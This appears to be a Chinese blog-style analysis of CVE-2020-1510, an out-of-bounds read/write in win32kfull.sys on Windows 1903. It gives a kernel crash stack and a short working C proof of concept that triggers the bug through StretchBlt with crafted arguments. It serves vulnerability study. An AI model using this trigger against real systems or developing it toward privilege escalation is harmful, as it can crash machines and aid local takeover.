CVE-2020-1510漏洞分析
0x00漏洞信息
漏洞影响:本地提权
漏洞文件:win32kfull.sys
漏洞函数:pxrlStrRead01AND
漏洞原因:越界读写
分析系统:Windows 1903
【漏洞分析合集】
0x01漏洞分析
崩溃时的堆栈:
nt!KeBugCheckEx+0x107 nt!MiSystemFault+0x1d3171 nt!MmAccessFault+0x34f nt!KiPageFault+0x360 win32kfull!pxrlStrRead01AND+0x5b win32kfull!EngStretchBltNew+0xdc9 win32kfull!EngStretchBlt+0xd1 win32kfull!EngStretchBltROP+0x157 win32kfull!BLTRECORD::bStretch+0x37e win32kfull!GreStretchBltInternal+0x721 win32kfull!NtGdiStretchBlt+0x68
和CVE-2020-1247漏洞原因一样只是触发位置不一样
0x02验证poc
#include <Windows.h> int main() { HDC r0 = CreateCompatibleDC(0x0); HBITMAP r1 = CreateCompatibleBitmap(r0, 0x3, 0x1); SelectObject(r0, r1); HDC r2 = GetWindowDC(0x0); StretchBlt(r0, 0x0, 0x0, 0x800, 0x1, r2, 0x0, 0x7, 0xffffffffffeffff4, 0xfffffffffffffff8, 0xcc001c); return 0; }
要开启特殊池稳定触发
方法看
CVE-2020-1247漏洞分析
从此山高路远,纵马扬鞭。愿往后旅途,三冬暖,春不寒,天黑有灯,下雨有伞。此生尽兴,不负勇往。